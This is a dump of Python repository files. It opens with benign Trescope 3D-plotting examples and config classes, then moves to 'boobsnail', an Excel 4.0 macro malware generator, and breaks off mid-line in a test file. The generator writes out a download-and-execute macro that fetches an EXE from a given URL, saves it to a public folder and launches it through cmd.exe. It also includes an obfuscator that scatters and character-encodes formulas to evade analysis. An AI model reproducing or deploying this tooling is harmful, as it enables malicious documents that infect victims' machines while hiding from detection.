metadata
dict
text
stringlengths
60
3.49M
{ "source": "aaabbb2021/Trescope", "score": 2 }
#### File: example/src/example_plot_scatter3d.py ```python from trescope import Trescope, Layout from trescope.config import (Scatter3DConfig, ScatterMode, AxisHelper3DConfig) from trescope.toolbox import simpleDisplayOutputs def plot_scatter_3d(): Trescope().initialize(True, simpleDisplayOutputs(1, 3)) Trescope().selectOutput(0).updateLayout(Layout().title('marker')) Trescope().selectOutput(1).updateLayout(Layout().title('line')) Trescope().selectOutput(1).updateLayout(Layout().title('marker+line')) Trescope().selectOutput(0).plotAxisHelper3D().withConfig(AxisHelper3DConfig().width(5).axisLength(.5)) Trescope().selectOutput(0).plotScatter3D( [0, 1, 1, 0], [0, 0, 1, 1], [0, 0, 0, 0] ).withConfig(Scatter3DConfig().color(0xffff0000).mode([ScatterMode.MARKERS])) Trescope().selectOutput(1).plotScatter3D( [0, 1, 1, 0], [0, 0, 1, 1], [0, 0, 0, 0] ).withConfig(Scatter3DConfig().color(0xff00ff00).mode([ScatterMode.LINES])) Trescope().selectOutput(2).plotScatter3D( [0, 1, 1, 0], [0, 0, 1, 1], [0, 0, 0, 0] ).withConfig(Scatter3DConfig().color(0xff0000ff).mode([ScatterMode.MARKERS, ScatterMode.LINES]).width(4).size(8)) if __name__ == '__main__': plot_scatter_3d() ``` #### File: example/src/example_plot_wireframe3d.py ```python from trescope import Trescope from trescope.config import (Wireframe3DConfig) from trescope.toolbox import simpleDisplayOutputs def plot_wireframe_3d(): Trescope().initialize(True, simpleDisplayOutputs(1, 4)) Trescope().selectOutput(0).plotWireframe3D( [0, 1, 1, 0], [0, 0, 1, 1], [0, 0, 0, 0] ).withConfig(Wireframe3DConfig().indices( [0, 3], [1, 1], [3, 2]).color(0xffff0000).width(1)) Trescope().selectOutput(1).plotWireframe3D( [0, 1, 1, 0], [0, 0, 1, 1], [0, 0, 0, 0] ).withConfig(Wireframe3DConfig().indices( [0, 3], [1, 1], [3, 2]).color(0xff00ff00).width(5)) if __name__ == '__main__': plot_wireframe_3d() ``` #### File: trescope/config/PieConfig.py ```python from trescope.config import Config class PieConfig(Config): """Config for :py:meth:`trescope.Output.plotPie`""" def __init__(self): super().__init__() def toDict(self) -> dict: return {**super().toDict()} ``` #### File: trescope/config/Scatter3DConfig.py ```python from typing import List, Union from trescope.config import Config, ScatterMode, ScatterSymbol from trescope.core.Utils import toListIfNumpyOrTensorArray class Scatter3DConfig(Config): """Config for :py:meth:`trescope.Output.plotScatter3D`""" def __init__(self): super().__init__() self.__color: Union(int, List[int]) = 0xff000000 self.__size: float = 5 self.__width: float = 1 self.__mode: List[str] = [ScatterMode.MARKERS] self.__symbol = ScatterSymbol.Circle def color(self, color: Union[int, List[int]]): """ Specify color . :param color: color , default 0xff000000 (means black with no transparency) :return: self , for chain call """ self.__color = color return self def size(self, size: float): """ Specify size . :param size: size , default 5 :return: self , for chain call """ self.__size = size return self def width(self, width: float): """ Specify line width . :param width: width , default 1 :return: self , for chain call """ self.__width = width return self def mode(self, modeCombination: List[str]): """ Specify mode , enumeration of :py:attr:`trescope.config.ScatterMode.MARKERS` , :py:attr:`trescope.config.ScatterMode.LINES` or combination of them . :param modeCombination: combination of mode , default `[trescope.config.ScatterMode.MARKERS]` :return: self , for chain call """ self.__mode = modeCombination return self def symbol(self, symbolOrSymbols): """ Specify symbol . :param symbolOrSymbols: symbol , see :py:mod:`trescope.config.ScatterSymbol` , default :py:attr:`trescope.config.ScatterSymbol.Circle` :return: self , for chain call """ self.__symbol = symbolOrSymbols return self def toDict(self): return { **super().toDict(), 'color': toListIfNumpyOrTensorArray(self.__color), 'size': self.__size, 'width': self.__width, 'symbol': self.__symbol, 'mode': self.__mode } ``` #### File: trescope/controller/Label.py ```python from trescope.controller import ControllerNode class Label(ControllerNode): """ Label for information display . """ def __init__(self): super().__init__() self.__value = None self.__openIfLink = True def value(self, value: str): """ Value of label . :param value: value :return: self , for chain call """ self.__value = value return self def openIfLink(self, openIfLink: bool): """ Forward to a new web page if label is a hyper link . :param openIfLink: open if link , default `True` :return: self , for chain call """ self.__openIfLink = openIfLink return self def toDict(self): return {**super().toDict(), 'type': 'Label', 'value': self.__value, 'openIfLink': self.__openIfLink} ``` #### File: trescope/controller/VisualDataPickControl.py ```python from typing import List, Union from trescope.controller import ControllerNode class BoundingBox2D(): """ Image bounding box . """ def __init__(self, x, y, width, height): self.__x = x self.__y = y self.__width = width self.__height = height def __str__(self): return f'(bbox2d,{self.__x},{self.__y},{self.__width},{self.__height})' class VisualDataPickControl(ControllerNode): """ Control for picking visual data , now support **Mesh3D** , **Scatter3D** and **Image bounding box** . """ def __init__(self): super().__init__() self.__attachOutput = None self.__colorWhenPicked: int = 0xff888888 self.__defaultValue: List = [] def attachOutput(self, id: Union[str, int]): """ Specify which output to pick data . :param id: output id :return: self , for chain call """ self.__attachOutput = id return self def colorWhenPicked(self, color: int): """ Specify color when data picked . :param color: color , default 0xff888888 (means light white with no transparency) :return: self , for chain call """ self.__colorWhenPicked = color return self def defaultValue(self, *value): """ Specify default data picked . :param value: value :return: self , for chain call """ self.__defaultValue = value return self def toDict(self): return {**super().toDict(), 'type': 'VisualDataPickControl', 'attachOutput': self.__attachOutput, 'colorWhenPicked': self.__colorWhenPicked, 'value': list(map(str, self.__defaultValue)) } ``` #### File: trescope/core/Input.py ```python from trescope.controller import ControllerNode class Input(object): """ Input for adding control , only works for display output . By adding control , you can input user information to control program execution to complete some jobs , such as labelling . Input data will return by :py:meth:`Trescope.breakPoint` """ def __init__(self, host): from trescope.core import Output self.__host: Output = host def addControl(self, controlNode: ControllerNode): """ Add control . :param controlNode: control :return: self , for chain call """ self.__host.getHost()._internalCommit(function='addControl', **self.__host.toDict(), **controlNode.toDict()) return self def waitForControllerWithId(self, controlId, identifier: str = ''): rawResult = self.__host._internalCommit(function='waitForControllerWithId', controlId=controlId, identifier=identifier) controlResult = rawResult['result'] if 'TriggerControl' == controlResult['type']: return controlId return Input.__toValueByType(controlResult['type'], controlResult['newValue']) @staticmethod def __toValueByType(type_, valueString): swithcer = { 'BooleanControl': bool, 'ColorControl': lambda string: int(f'0xff{string[1:]}', 16), # TODO bug alpha 'EnumControl': str, 'RangeControl': float, 'TextControl': str } return swithcer[type_](valueString) ``` #### File: trescope/core/Layout.py ```python from typing import Union, List import numpy as np from trescope.config import Camera, PerspectiveCamera from trescope.core.Utils import toListIfNumpyOrTensorArray class Layout(object): """ Specify output layout , such as title , axis , camera (if 3d data) and so on . """ def __init__(self): self.__title: str = '' self.__camera: Camera = PerspectiveCamera() self.__showLegend: bool = True self.__axisUniformScale: bool = True self.__xTickValues, self.__xTickTexts = None, None self.__legendOrientation = 'h' self.__hoverLabelTextColor = None self.__hoverLabelBackgroundColor = None def title(self, title: str): """ Specify output title . :param title: title :return: self , for chain call """ self.__title = title return self def showLegend(self, show: bool): """ Show legend or not . :param show: True or False , default True :return: self , for chain call """ self.__showLegend = show return self def legendOrientation(self, orientation: str): """ Specify legend orientation . :param orientation: `vertical` or `horizontal` , default `vertical` :return: self , for chain call """ self.__legendOrientation = 'v' if 'vertical' == orientation else 'h' return self def axisUniformScale(self, axisUniformScale: bool): """ Specify axis uniform scale or not . :param axisUniformScale: True or False , default True :return: self , for chain call """ self.__axisUniformScale = axisUniformScale return self def axisXTicks(self, tickValues: Union[List[float], np.ndarray], tickTexts: List[str]): """ Specify x axis ticks . :param tickValues: values of ticks :param tickTexts: text of ticks :return: self , for chain call """ self.__xTickValues = tickValues self.__xTickTexts = tickTexts return self def hoverLabelStyle(self, textColor: int, backgroundColor: int): """ Specify hover label style . :param textColor: text color :param backgroundColor: background color :return: self , for chain call """ self.__hoverLabelTextColor = textColor self.__hoverLabelBackgroundColor = backgroundColor return self def camera(self, camera: Camera): """ Specify camera , only works for 3d data . :param camera: camera :return: self , for chain call """ self.__camera = camera return self def toDict(self): return { 'title': self.__title, 'axisUniformScale': self.__axisUniformScale, 'xTickValues': toListIfNumpyOrTensorArray(self.__xTickValues), 'xTickTexts': toListIfNumpyOrTensorArray(self.__xTickTexts), 'showLegend': self.__showLegend, 'legendOrientation': self.__legendOrientation, 'hoverLabelTextColor': self.__hoverLabelTextColor, 'hoverLabelBackgroundColor': self.__hoverLabelBackgroundColor, **self.__camera.toDict() } ``` #### File: trescope/core/Utils.py ```python import os import random import string from pathlib import Path from typing import Union from functools import wraps import numpy as np from trescope.core import ELog class Singleton(type): _instances = {} def __call__(cls, *args, **kwargs): if cls not in cls._instances: cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs) return cls._instances[cls] def singleton(cls, *args, **kw): instances = {} @wraps(cls) def _singleton(): if cls not in instances: instances[cls] = cls(*args, **kw) return instances[cls] return _singleton def generateRandomString(length: int): return ''.join(random.choices(string.ascii_uppercase + string.digits, k=length)) def get_abs_path(path_link_maybe: Union[str, Path]) -> str: if isinstance(path_link_maybe, str): return path_link_maybe if 'http' == path_link_maybe[:4] else os.path.abspath(path_link_maybe) if isinstance(path_link_maybe, Path): return os.fspath(path_link_maybe) return str(path_link_maybe) def toListIfNumpyOrTensorArray(array): try: import torch if isinstance(array, torch.Tensor): array = array.numpy() except: ELog.error('import torch failed') if isinstance(array, np.ndarray): return array.tolist() if isinstance(array, list) and len(array) > 0 and isinstance(array[0], np.ndarray): return [toListIfNumpyOrTensorArray(elementArray) for elementArray in array] return array ```
{ "source": "aaaddress1/boobsnail", "score": 3 }
#### File: aaaddress1/boobsnail/boobsnail.py ```python from excel4lib.generator import * import sys generators = [Excel4NtDonutGenerator, Excel4ExecGenerator, Excel4DownloadExecuteGenerator] banner = """ ___. ___. _________ .__.__ \_ |__ ____ ____\_ |__ / _____/ ____ _____ |__| | | __ \ / _ \ / _ \| __ \ \_____ \ / \\__ \ | | | | \_\ ( <_> | <_> ) \_\ \/ \ | \/ __ \| | |__ |___ /\____/ \____/|___ /_______ /___| (____ /__|____/ \/ \/ \/ \/ \/ Author: @_mzer0 @stm_cyber """ def print_usage(): print(banner) print("Usage: {} <generator>".format(sys.argv[0])) print("Generators:") for g in generators: print("{} - {}".format(g.name, g.description)) if __name__ == "__main__": if len(sys.argv) < 2: print_usage() sys.exit(1) generator = sys.argv[1] for g in generators: if g.name.lower() == generator.lower(): Boobsnail.print_banner() g.run(sys.argv[2:]) sys.exit(1) else: print("Unknown generator {}!".format(generator)) print_usage() sys.exit(1) ``` #### File: generator/download_execute/download_execute_generator.py ```python import sys from excel4lib.generator.generator import * from excel4lib.lang import * class Excel4DownloadExecuteGenerator(Excel4Generator): description = "Downloads and executes EXE file" name = "Excel4DownloadExecuteGenerator" def __init__(self, worksheet_name="DownloadExecute"): Excel4Generator.__init__(self, worksheet_name, Excel4Obfuscator(), desc=Excel4DownloadExecuteGenerator.description) def custom_args(self): ''' Adds command line arguments to ArgumentParser :return: ''' self.args_parser.add_argument("--url", "-u", required=False, help="URL from which download EXE file") def generate_macro(self): if not self.args.url: self.args_parser.error("--url argument is required") sys.exit(1) print("[*] Creating macro with URL {} ...".format(self.args.url)) exe_path = self.macro.variable("exepath", "C:\\Users\\Public\\test.exe") download_call = self.macro.register_url_download_to_file_a("DOWNLOAD") self.macro.formula(download_call.get_call_name(), 0, self.args.url, exe_path, 0, 0) shell_arg = self.macro.variable("args", self.macro.argument("CONCATENATE", "/c ", exe_path)) execute_call = self.macro.register_shell_execute("CMDRUN") self.macro.formula(execute_call.get_call_name(), 0, "open", "C:\\Windows\\System32\\cmd.exe", shell_arg, 0, 5) print("[*] Macro created") if not self.args.disable_obfuscation: Excel4Config.obfuscator.enable = True print("[*] Obfsucating macro with {} obfuscator ...".format(self.obfuscator.name)) else: Excel4Config.obfuscator.enable = False print("[*] Saving output to {} ...".format(self.args.out)) self.macro.to_csv_file(self.args.out) print("[*] Output saved to {}".format(self.args.out)) print("[*] Trigger cords: column: {} row: {}".format(self.macro.trigger_x, self.macro.trigger_y)) @staticmethod def run(args): ''' Runs generator :param args: cli arguments :return: ''' generator = Excel4DownloadExecuteGenerator() generator.init_args() if len(args) == 0: generator.args_parser.print_help() sys.exit(1) generator.parse(args) generator.generate() if __name__ == '__main__': Excel4DownloadExecuteGenerator.run(sys.argv[1:]) ``` #### File: excel4lib/macro/excel4_result.py ```python from .excel4_instruction import * class Excel4Result(Excel4Instruction): ''' Represents cell in which result of another call will be placed (for example Formula((...), R1C2) R1C2 is address of cell in which FORMULA call will save return value in this case R1C2 should be represented as Excel4Result object) ''' def __init__(self, x, y): Excel4Instruction.__init__(self, x, y) def __str__(self): return "" class Excel4ResultLoop(Excel4Result): pass class Excel4ResultCondition(Excel4Result): pass class Excel4ResultEndLoop(Excel4Result): pass ``` #### File: macro/obfuscator/excel4_obfuscator.py ```python import random from excel4lib.macro.excel4_macro_extension import * from excel4lib.utils import * from excel4lib.macro.excel4_instruction import * from excel4lib.macro.excel4_argument import * from excel4lib.macro.excel4_formula import * from excel4lib.macro.excel4_value import * from excel4lib.macro.excel4_variable import * from excel4lib.exception import * from excel4lib.config import * from excel4lib.macro.excel4_result import * from excel4lib.macro.excel4_register_formula import * from excel4lib.sheet import * class Excel4Obfuscator(Excel4MacroExtension): name = "standard" description = "Allows to obfuscate macro with standard Excel4.0 formulas suchas BITXOR, SUM, MID etc." ''' Allows to obfuscate formulas, scatter them across worksheet, obfuscate variable names and values. ''' def __init__(self, config=Excel4Config.obfuscator): Excel4MacroExtension.__init__(self) # Obfuscator configuration self.config = config # List of char obfuscation methods self.ob_tech = [] # Max length of cell self.cell_max_length = self.config.cell_limit def _generate_noise(self, only_empty = False): ''' Adds random values to worksheet cells :param only_empty: flags that tells if add noise only to empty cells ( not reserved) ''' # Walk through worksheet cell by cell for cords in self.worksheet.worksheet_iterate(): # Choose whether add noise to this cell or not if random.randint(0,10) != 1: continue noise = random_string(random.randint(4, 20)) noise_cell = self._create_value(cords[0], cords[1], noise) # Check if cell is reserved if self.worksheet.is_reserved(cords[0], cords[1]): if only_empty: continue # Check if obfuscation of cell is enabled cell = self.worksheet.get_cell(cords[0], cords[1]) if not cell._spread or not cell._obfuscate: continue try: # Move cell to the next cell if reserved self.worksheet.move_cell(cell) except CouldNotMoveCellException as ex: continue curr_cords = self.worksheet.get_current_cords() # Add noise self.worksheet.add_cell(noise_cell) self.worksheet.set_current_cords(curr_cords[0], curr_cords[1]) def _spread_formulas(self, trigger_x, trigger_y): ''' Spreads formulas across cells in worksheet :param trigger_x: number of column in which first call is placed :param trigger_y: number of row in which first call is placed ''' # Get current cords. We need to remember current cord cause we will want to back execution to this cell. cords_backup = self.worksheet.get_current_cords() cells_cache = {} # Get cells to spread # For each column in worksheet for t in self.worksheet.column_iterate(): # Get column number c_num = t[0] # Get cells in column cells_temp = t[1] if not cells_temp: continue values = cells_temp.values() # For each cell in column for cell in values: # Check if obfuscation of cell/formula is enabled if (not cell._spread) or (not cell._obfuscate): continue # Save cell in cache try: cells_cache[c_num][cell.y] = cell except KeyError: cells_cache[c_num] = {cell.y : cell} # Remove cells from worksheet # For each column in cache for c in cells_cache.keys(): for cell in cells_cache[c].values(): # Remove cell from worksheet # x,y of cell will be changed, and cell will be placed at another cords self.worksheet.remove_cell(cell) trigger_cell = None # Add jump to first call if trigger_x in cells_cache: # Find first call for row in cells_cache[trigger_x]: if row >= trigger_y: trigger_cell = self._go_to(trigger_x, row, cells_cache[trigger_x][row]) self.worksheet.add_cell(trigger_cell) break # Spread cells across worksheet # For each column in cache for c in cells_cache.keys(): self._spread_column(list(cells_cache[c].values()), trigger_x, trigger_y, trigger_cell) # Restore original cords self.worksheet.set_current_cords(cords_backup[0], cords_backup[1]) def _spread_column(self, cells, trigger_x, trigger_y, trigger_cell): ''' Spread `cells` across worksheet. :param cells: list of cells that are in the same column :param trigger_x: auto_open or auto_close function column :param trigger_y: auto_open or auto_close function row :param trigger_cell: auto_open or auto_close cell ''' # Number of cells cells_num = len(cells) # The number of formulas that have already been spread across sheet cnt = 0 fail_cnt = 0 for_loop_cache = [] if not cells: return while cnt < cells_num: # Generate random cords # IF all columns are reserved then add new one and place payoad there if fail_cnt > 1000: self.config.spread_x_max = self.config.spread_x_max + 1 target_x = self.config.spread_x_max else: target_x = random.randint(self.config.spread_x_min, self.config.spread_x_max) target_y = random.randint(self.config.spread_y_min, self.config.spread_y_max) # Space between auto_open/auto_close cell and first call should be empty if(target_x == trigger_x) and (target_y in range(trigger_y, trigger_cell.y)): continue # If the same coordinates are drawn then randomize again if (target_x == self.worksheet._curr_x) and (target_y == self.worksheet._curr_y): # Inc failure counter fail_cnt = fail_cnt + 1 continue height = random.randint(1, cells_num - cnt) # Check if cells are free # We need to add 1 to height since we need additional cell for GOTO formula if self.worksheet.is_reserved(target_x, target_y, height + 1 + 1 + 1): # Inc failure counter fail_cnt = fail_cnt + 1 continue self.worksheet.set_current_cords(target_x, target_y) cnt_h = cnt+height # Add random number of cells to worksheet at random cords for cell in cells[cnt:cnt_h]: # Loops require end statement in the same column # So we need to place them in the same one if issubclass(type(cell), Excel4LoopFormula): # Save column and row number of this loop for_loop_cache.append((self.worksheet._curr_x, self.worksheet._curr_y + (cnt_h - cnt) + 2)) elif issubclass(type(cell), Excel4EndLoopFormula): break self.worksheet.add_next_cell(cell) cnt = cnt + 1 # If there are more cells to spread if cnt < cells_num: # @HACK # If cells[cnt] is Ecel4Variable then get_reference function will return variable name # But if this variable name is not defined or this variable name is not storing address of another cell # then we can't GOTO to this formula(we need address of this formula). # So to bypass this we need to add an empty Excel4Value, because then get_reference function will return address of cell if issubclass(type(cells[cnt]), Excel4Variable): empty = self._create_empty_formula(cells[cnt].x, cells[cnt].y) cells.insert(cnt, empty) cells_num = cells_num + 1 # If there are more cells to spread, then redirect macro execution # to the next cell. self.worksheet.add_next_cell(self._go_to(-1, -1, cells[cnt])) else: break if issubclass(type(cells[cnt]), Excel4EndLoopFormula): if len(for_loop_cache) < 1: raise Excel4LoopFormulaMissing("Excel4EndLoopFormula detected but Excel4LoopFormula is missing. Excel4 requires that the loops and NEXT() formula be in the same column.") cords = for_loop_cache.pop() cells[cnt].x = cords[0] cells[cnt].y = cords[1] self.worksheet.add_cell(cells[cnt]) cnt = cnt + 1 # If there are more cells to spread if cnt < cells_num: # @HACK # If cells[cnt] is Ecel4Variable then get_reference function will return variable name # But if this variable name is not defined or this variable name is not storing address of another cell # then we can't GOTO to this formula(we need address of this formula). # So to bypass this we need to add an empty Excel4Value, because then get_reference function will return address of cell if issubclass(type(cells[cnt]), Excel4Variable): empty = self._create_empty_formula(cells[cnt].x, cells[cnt].y) cells.insert(cnt, empty) cells_num = cells_num + 1 # If there are more cells to spread, then redirect macro execution # to the next cell. self.worksheet.add_cell(self._go_to(cells[cnt-1].x, cells[cnt-1].y + 1, cells[cnt])) else: break # ADD RETURN self.worksheet.add_next_cell(self._create_formula(-1, -1, "RETURN")) def _create_argument_object(self, instruction, *args): instruction_name = Excel4InstructionName(instruction, self.config.translate) o = Excel4FormulaArgument(instruction_name, *args) if not self.config.translate: # Do not translate obfuscator objects o.revert_translation() return o def _create_formula(self,x, y, instruction, *args): instruction_name = Excel4InstructionName(instruction, self.config.translate) o = Excel4Formula(x, y, instruction_name, *args) if not self.config.translate: # Do not translate obfuscator objects o.revert_translation() return o def _create_value(self, x, y, value): o = Excel4Value(x,y, value) if not self.config.translate: # Do not translate obfuscator objects o.revert_address_translation() return o def _create_empty_formula(self, x, y): return self._create_value(x,y,"") def _create_result_formula(self, x, y): o = Excel4Result(x,y) if not self.config.translate: # Do not translate obfuscator objects o.revert_address_translation() return o def _go_to(self, x, y, formula): instruction_name = Excel4InstructionName("GOTO", self.config.translate) o = Excel4GoToFormula(x, y, instruction_name, formula) if not self.config.translate: # Do not translate obfuscator objects o.revert_translation() return o def _char(self, s): ''' Returns CHAR formula :param s: string, char :return: ''' return self._create_argument_object("CHAR", s) def char(self, c): ''' Puts c character in CHAR formula :param c: charcater :return: CHAR formula call ''' if not is_number(c): c = ord(c) return self._char(c) def int(self, c): ''' Converts c character to CHAR(INT(C)) call :param c: charcater :return: ''' if not is_number(c): c = ord(c) return self._char(self._create_argument_object("INT", str(c))) def sum(self, c): ''' Converts c character to CHAR(SUM(R, c-k/k-c) call :param c: charcater :return: ''' if not is_number(c): c = ord(c) k = random.randint(1, 1000) while k == c: k = random.randint(1, 1000) if k < c: r = c - k else: r = k - c return self._char(self._create_argument_object("SUM", r, k)) def mid(self, c): ''' Converts c character to MID(STR, RAND_INDEX,1) call :param c: charcater :return: ''' if is_number(c): c = chr(c) length = random.randint(3, 8) rand_str = random_string(length) rand_ind = random.randint(0, length) rand_str = rand_str[:rand_ind] + c + rand_str[rand_ind:] return self._create_argument_object("MID", rand_str, rand_ind+1, 1) def xor(self, c): ''' Converts c character to CHAR(BITXOR(R,K) call :param c: charcater :return: ''' if not is_number(c): c = ord(c) k = random.randint(1, 1000) while k == c: k = random.randint(1, 1000) r = k ^ c return self._char(self._create_argument_object("BITXOR", r, k)) def mod(self, c): ''' Converts c character to CHAR(MOD(R,K) call :param c: charcater :return: ''' if not is_number(c): c = ord(c) k = random.randint(c + 1, 600) r = k + c return self._char(self._create_argument_object("MOD", r, k)) def evaluate(self, c): #=CHAR(EVALUATE("1+64")) pass def concat(self, x, y, *args): ''' Creates CONCATENATE formula ''' return self._create_formula(x, y, "CONCATENATE", *args) def _update_obfuscation_tech(self): self.ob_tech = [] if self.config.obfuscate_int: self.ob_tech.append(self.int) if self.config.obfuscate_char: self.ob_tech.append(self.char) if self.config.obfuscate_mid: self.ob_tech.append(self.mid) if self.config.obfuscate_xor: self.ob_tech.append(self.xor) if self.config.obfuscate_mod: self.ob_tech.append(self.mod) def _obfuscate_char(self, c): if c == '"': formula = self.char(c) else: self._update_obfuscation_tech() func = random.choice(self.ob_tech) formula = func(c) return formula def _split_instructions(self, objects, block_size): i = 0 temp = [] for o in objects: if issubclass(type(o), Excel4FormulaArgument): # For arguments we need to compute length of full instruction with arguments o_len = o.get_length() elif issubclass(type(o), Cell): # For calls (instructions in cells) we will use references so length we be equal to address of the cell o_len = len(o.get_address()) else: raise Excel4UnsupportedTypeException("Received unsupported type: {}".format(type(o))) if (i+o_len) > block_size: yield temp i = 0 temp = [] i = i + o_len temp.append(o) if temp: yield temp def _obfuscate_formula(self, formula): ''' Obfuscates formula object. Should work for all classes that inherit from Excel4Formula. _obfuscate_formula works as follow: - convert formula with arguments to string ex: =TEST("A","B"); - for each character in formula string: - obfuscate character with random function such as: MID, SUM, MOD etc. - end of loop - generate CONCATENATE formulas in order to concatenate all characters during excel 4.0 macro execution; - pass deobfuscated string to FORMULA call ex: =FORMULA(DEOBFUSCATED, ADDRESS_TO_SAVE_FORMULA) :param formula: :return: ''' if not formula._obfuscate_formula: return [] formulas = self._obfuscate_text(str(formula), formula.tag) # Obfusacted formula will be deobfusacted and saved into following cell # So you can get result of your formula from this cell # This one is empty because cell will be filled after excel 4.0 macro execute # @HACK if issubclass(type(formula), Excel4LoopFormula): call_reference = Excel4ResultLoop(0, 0) elif issubclass(type(formula), Excel4ConditionFormula): call_reference = Excel4ResultCondition(0, 0) elif issubclass(type(formula), Excel4EndLoopFormula): call_reference = Excel4ResultEndLoop(0, 0) else: call_reference = self._create_result_formula(0, 0) call_reference.tag = formula.tag result_formula = self._create_formula(0, 0, "FORMULA", formulas[-1], call_reference) call_reference.start_cell = formulas[0] formulas.append(result_formula) formulas.append(call_reference) return formulas def obfuscate_formula(self, formula): ''' :param formula: :return: ''' formulas = self._obfuscate_formula(formula) if formulas: formulas[-1].x = formula.x formulas[-1].y = formula.y return formulas def obfuscate_formulas(self, fomulas): ''' Obfuscates formulas. Formulas should be ordered by execution. This function also adds obfusacted formulas to the worksheet. :param fomulas: :return: ''' obfuscated_formulas = [] column = self.worksheet.get_column(self.macro.trigger_x) if not column: # Raise exception return start_of_macro = None # Find first call in trigger column for cell in column.values(): if cell.y >= self.macro.trigger_y: start_of_macro = cell break for f in fomulas: if not f._obfuscate: continue if issubclass(type(f), Excel4Formula): # Obfuscate formula call obfuscated = self.obfuscate_formula(f) # If formula is not obfuscated, then continue execution if not obfuscated: continue # If obfuscated, then formula is splitted into multiple CONCATENATE and FORMULA calls. # Last element in obfuscated variable(list) is cell in which deobfuscated formula # will be placed during macro execution. obfuscated_ref = obfuscated[-1] # Add all formulas to worksheet for o in obfuscated[:-1]: #self.worksheet.add_above(o, f) obfuscated_formulas.append(o) # Replace formula f with obfuscated_ref in worksheet self.worksheet.replace_cell(f, obfuscated_ref) # Update references # Formula object (f) holds references to objects in which is used. # We need to change these references to point to the obfuscated_ref obfuscated_ref.x = f.x obfuscated_ref.y = f.y f._change_reference(obfuscated_ref) if start_of_macro == f: start_of_macro = obfuscated_ref # Spread obfuscated formulas across the worksheet self._spread_column(obfuscated_formulas, self.macro.trigger_x, self.macro.trigger_y, start_of_macro) # Redirect macro 4 execution to deobfuscate formulas self.worksheet.replace_cell(start_of_macro, self.macro._create_go_to(start_of_macro.x, start_of_macro.y, obfuscated_formulas[0])) # After deobfuscation redirect execution to original formula start_of_macro.x = obfuscated_formulas[-1].x start_of_macro.y = obfuscated_formulas[-1].y + 1 return_stm = self.worksheet.get_cell(obfuscated_formulas[-1].x, obfuscated_formulas[-1].y+1) #self.worksheet.add_above(self._create_formula(return_stm,return_stm.y, "PAUSE"), return_stm) self.worksheet.add_above(start_of_macro, return_stm) def obfuscate_function_name(self, formula): if not issubclass(type(formula), Excel4RegisterFormula): raise Excel4WrongVariableType("Only instances of Excel4RegisterFormula could be obfuscated. Provided: {}".format(type(formula))) if formula._obfuscate: formula.set_function_text(random_string(random.randint(4, 10))) return formula def obfuscate_variable_name(self, formula): if not issubclass(type(formula), Excel4Variable): raise Excel4WrongVariableType("Only instances of Excel4Variable could be obfuscated. Provided: {}".format(type(formula))) if formula._obfuscate: formula.set_name(random_string(random.randint(4, 10))) return formula def obfuscate_variable_value(self, formula): if not issubclass(type(formula), Excel4Variable): raise Excel4WrongVariableType("Only instances of Excel4Variable could be obfuscated. Provided: {}".format(type(formula))) formulas = [] if formula._obfuscate: # Do not obfuscate numbers try: if is_number(formula.value): raise Exception("Obfuscation of numbers not supported") elif issubclass(type(formula.value), Cell): # Obufscate address raise Exception("Obfuscation of Cell objects not supported") formulas = self._obfuscate_text(formula.value, formula.tag) # Set value as address of cell in which deobfuscated value will be saved formula.value = formulas[-1] except: pass return formulas def _obfuscate_variable(self, formula): # Obfuscate variable name #formula.name = random_string(random.randint(4,10)) # Obfuscate variable value if it's behaviour is similar to str formulas = [] try: if issubclass(type(formula.value), Excel4Value): if formula.value.is_num(): raise Exception() formulas = self._obfuscate_text(formula.value, formula.tag) # Set value as address of cell in which deobfuscated value will be saved formula.value = formulas[-1] except: pass # Add variable as last call formulas.append(formula) return formulas def _obfuscate_text(self, text, tag=""): ''' Obfuscates every char in text and returns concat formulas that allows to restore original string :param text: string to obfuscate :return: ''' text_len = len(text) block_len = self.cell_max_length # Obfusacted characters obfuscated_chars = [] # List of concat formulas which allows to restore original string concat_objects = [[]] # Obfusacte every char in text for i in range(0, text_len): c = text[i] obfuscated_chars.append(self._obfuscate_char(c)) # Pass obfusacted chars to concat formula for o in self._split_instructions(obfuscated_chars, block_len): concat_objects[0].append(self.concat(0, 0, *o)) # If there is more than one concatenate formula then we need to concatenate these formulas # Here is a little bug. At this stage we don't know what address has concatenate formula. # So we don't know the exact length of this formula. i = 0 while True: concat_objects.append([]) for o in self._split_instructions(concat_objects[i], block_len): concat_objects[i + 1].append(self.concat(0, 0, *o)) if len(concat_objects[i + 1]) < 2: break i = i + 1 r = [] if not tag: tag = random_tag(text) for o in concat_objects: for x in o: x.tag = tag r.append(x) return r ``` #### File: boobsnail/tests/test_excel4_formula.py ```python from unittest import TestCase from excel4lib.macro import * class TestExcel4Formula(TestCase): def test_translate(self): formula = Excel4Formula(1, 1, "GOTO") self.assertEqual(str(formula.instruction), "GOTO", "Should be GOTO") instruction = formula.get_instruction_translation("pl_PL") self.assertEqual(str(instruction), "PRZEJDŹ.DO", "Should be PRZEJDŹ.DO") self.assertEqual(str(formula.instruction), "GOTO", "Should be GOTO") def test_get_str(self): formula = Excel4Formula(1, 1, "GOTO") self.assertEqual(str(formula), "=GOTO()", "Should be =GOTO()") instruction = formula.get_str("pl_PL") self.assertEqual(str(instruction), "=PRZEJDŹ.DO()", "Should be =PRZEJDŹ.DO()") self.assertEqual(str(formula.get_str()), "=GOTO()", "Should be =GOTO()") jump = Excel4Formula(1, 1, "GOTO") goto = Excel4Formula(1, 1, "GOTO", jump) self.assertEqual(str(goto), "=GOTO(R1C1)", "Should be: =GOTO(R1C1)") self.assertEqual(str(goto.get_str("pl_PL")), "=PRZEJDŹ.DO(W1K1)", "Should be: =PRZEJDŹ.DO(W1K1)") self.assertEqual(str(jump), "=GOTO()", "Should be: =GOTO()") self.assertEqual(str(jump.get_reference()), "R1C1", "Should be: R1C1") self.assertEqual(str(goto.get_str()), "=GOTO(R1C1)", "Should be: =GOTO(R1C1)") class TestExcel4GoToFormula(TestCase): def test__parse_args(self): # String goto = Excel4GoToFormula(1,1,"GOTO","TEST") val = "\"TEST\"" self.assertEqual(str(goto._parse_args()), val, "Should be: "+val) # Numeric goto = Excel4GoToFormula(1,1,"GOTO",12) val = "12" self.assertEqual(str(goto._parse_args()), val, "Should be: "+val) # Logical goto = Excel4GoToFormula(1,1,"GOTO", Excel4LogicalTest(1,"=",Excel4FormulaArgument("GOTO"))) val = "1=GOTO()" self.assertEqual(str(goto._parse_args()), val, "Should be: " + val) val = "1=PRZEJDŹ.DO()" self.assertEqual(str(goto._parse_args("pl_PL")), val, "Should be: "+val) # Argument goto = Excel4GoToFormula(1,1,"GOTO", 